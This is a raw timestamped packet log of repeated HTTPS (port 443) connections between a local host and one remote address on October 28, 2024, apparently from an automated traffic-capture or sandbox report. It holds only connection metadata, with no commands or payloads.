                                                                                                                                                                            Oct 28, 2024 19:12:35.861200094 CET4434984813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.861726999 CET49848443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.861737013 CET4434984813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.861736059 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.861772060 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.862360001 CET49848443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.862365007 CET4434984813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.862369061 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.862385035 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.938277006 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.939300060 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.939377069 CET49847443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.939429045 CET49847443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.939445972 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.939455032 CET49847443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.939460039 CET4434984713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.942229986 CET49852443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.942265034 CET4434985213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.942358017 CET49852443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.942480087 CET49852443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.942491055 CET4434985213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.998245001 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.998357058 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.998399019 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.998424053 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.998461008 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.998583078 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.998600960 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:35.998614073 CET49849443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:35.998620987 CET4434984913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.001068115 CET49853443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.001173973 CET4434985313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.001262903 CET49853443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.001326084 CET4434984813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.001382113 CET49853443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.001384020 CET4434984813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.001400948 CET4434985313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.001429081 CET49848443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.001493931 CET49848443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.001503944 CET4434984813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.001518011 CET49848443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.001523972 CET4434984813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.003278017 CET49854443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.003290892 CET4434985413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.003355980 CET49854443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.003460884 CET49854443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.003469944 CET4434985413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.004147053 CET4434985013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.004462004 CET49850443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.004477978 CET4434985013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.004903078 CET49850443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.004909992 CET4434985013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.144367933 CET4434985013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.144517899 CET4434985013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.144690037 CET49850443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.144740105 CET49850443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.144757986 CET4434985013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.144769907 CET49850443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.144778013 CET4434985013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.147893906 CET49855443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.147948027 CET4434985513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.148051977 CET49855443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.148215055 CET49855443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.148241043 CET4434985513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.354234934 CET4434985113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.354829073 CET49851443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.354921103 CET4434985113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.355287075 CET49851443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.355300903 CET4434985113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.492378950 CET4434985113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.492731094 CET4434985113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.492857933 CET4434985113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.492934942 CET49851443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.492934942 CET49851443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.492970943 CET49851443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.492995977 CET4434985113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.493010998 CET49851443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.493017912 CET4434985113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.496081114 CET49856443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.496198893 CET4434985613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.496313095 CET49856443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.496496916 CET49856443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.496532917 CET4434985613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.740993977 CET4434985213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.741552114 CET49852443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.741574049 CET4434985213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.742166996 CET49852443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.742173910 CET4434985213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.771275997 CET4434985413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.771836996 CET49854443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.771850109 CET4434985413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.772373915 CET49854443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.772380114 CET4434985413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.781932116 CET4434985313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.782572031 CET49853443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.782623053 CET4434985313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.783004999 CET49853443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.783023119 CET4434985313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.902914047 CET4434985213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.903078079 CET4434985213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.903161049 CET49852443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.903453112 CET49852443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.903472900 CET4434985213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.903489113 CET49852443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.903495073 CET4434985213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.906835079 CET49857443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.906876087 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.906964064 CET49857443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.907155037 CET49857443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.907167912 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.908329964 CET4434985513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.908721924 CET49855443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.908757925 CET4434985513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.909212112 CET49855443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.909224033 CET4434985513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.912451982 CET4434985413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.912519932 CET4434985413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.912571907 CET49854443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.912723064 CET49854443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.912744999 CET4434985413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.912761927 CET49854443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.912766933 CET4434985413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.915261030 CET49858443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.915333033 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:36.915433884 CET49858443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.915587902 CET49858443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:36.915604115 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.162219048 CET4434985313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.162286043 CET4434985313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.162380934 CET49853443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.162689924 CET49853443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.162710905 CET4434985313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.162719965 CET49853443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.162728071 CET4434985313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.162782907 CET4434985513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.162823915 CET4434985513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.162867069 CET49855443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.162877083 CET4434985513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.162892103 CET4434985513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.162935972 CET49855443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.163044930 CET49855443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.163050890 CET4434985513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.163065910 CET49855443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.163069963 CET4434985513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.166316032 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.166327953 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.166363001 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.166409969 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.166435003 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.166485071 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.166620016 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.166630983 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.166635990 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.166661024 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.305959940 CET4434985613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.306644917 CET49856443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.306678057 CET4434985613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.307143927 CET49856443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.307152033 CET4434985613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.653322935 CET4434985613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.653465033 CET4434985613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.653534889 CET49856443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.653795004 CET49856443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.653820992 CET4434985613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.653846025 CET49856443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.653852940 CET4434985613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.657165051 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.657198906 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.657265902 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.657413006 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.657417059 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.800204039 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.800813913 CET49857443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.800834894 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.801341057 CET49857443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.801347017 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.912328005 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.913077116 CET49858443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.913099051 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.913547993 CET49858443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.913554907 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.938524008 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.939101934 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.939177990 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.939500093 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.939513922 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.940613031 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.940759897 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.940819979 CET49857443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.940897942 CET49857443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.940917015 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.940927029 CET49857443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.940932035 CET4434985713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.943836927 CET49862443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.943897963 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.943985939 CET49862443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.944130898 CET49862443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.944156885 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.963753939 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.964145899 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.964160919 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:37.964581966 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:37.964586020 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.050158024 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.050257921 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.050322056 CET49858443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.050452948 CET49858443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.050470114 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.050482988 CET49858443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.050489902 CET4434985813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.053417921 CET49863443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.053456068 CET4434986313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.053533077 CET49863443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.053689003 CET49863443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.053702116 CET4434986313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.080221891 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.080292940 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.080351114 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.080410004 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.080450058 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.080497026 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.080547094 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.080547094 CET49860443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.080580950 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.080605030 CET4434986013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.082652092 CET49864443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.082678080 CET4434986413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.082758904 CET49864443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.082887888 CET49864443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.082901001 CET4434986413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.112287045 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.112478018 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.112539053 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.112586021 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.112596989 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.112608910 CET49859443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.112612009 CET4434985913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.114753008 CET49865443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.114789963 CET4434986513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.114865065 CET49865443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.114988089 CET49865443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.115001917 CET4434986513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.422183037 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.422700882 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.422713995 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.423187971 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.423192978 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.561736107 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.561808109 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.561861992 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.561873913 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.561930895 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.561980009 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.562133074 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.562150002 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.562160015 CET49861443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.562165976 CET4434986113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.565093040 CET49866443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.565136909 CET4434986613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.565207005 CET49866443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.565485954 CET49866443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.565500975 CET4434986613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.716548920 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.717030048 CET49862443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.717098951 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.717644930 CET49862443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.717660904 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.794404030 CET4434986313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.794863939 CET49863443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.794879913 CET4434986313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.795361042 CET49863443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.795365095 CET4434986313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.853765011 CET4434986413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.854307890 CET49864443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.854334116 CET4434986413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.854804039 CET49864443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.854808092 CET4434986413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.855756044 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.855926037 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.856007099 CET49862443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.856065989 CET49862443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.856107950 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.856144905 CET49862443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.856162071 CET4434986213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.858876944 CET49867443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.858906031 CET4434986713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.858977079 CET49867443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.859097958 CET49867443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.859110117 CET4434986713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.919112921 CET4434986513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.919689894 CET49865443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.919702053 CET4434986513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.920164108 CET49865443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:38.920169115 CET4434986513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.932801008 CET4434986313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:38.933129072 CET4434986313.107.253.45192.168.2.4
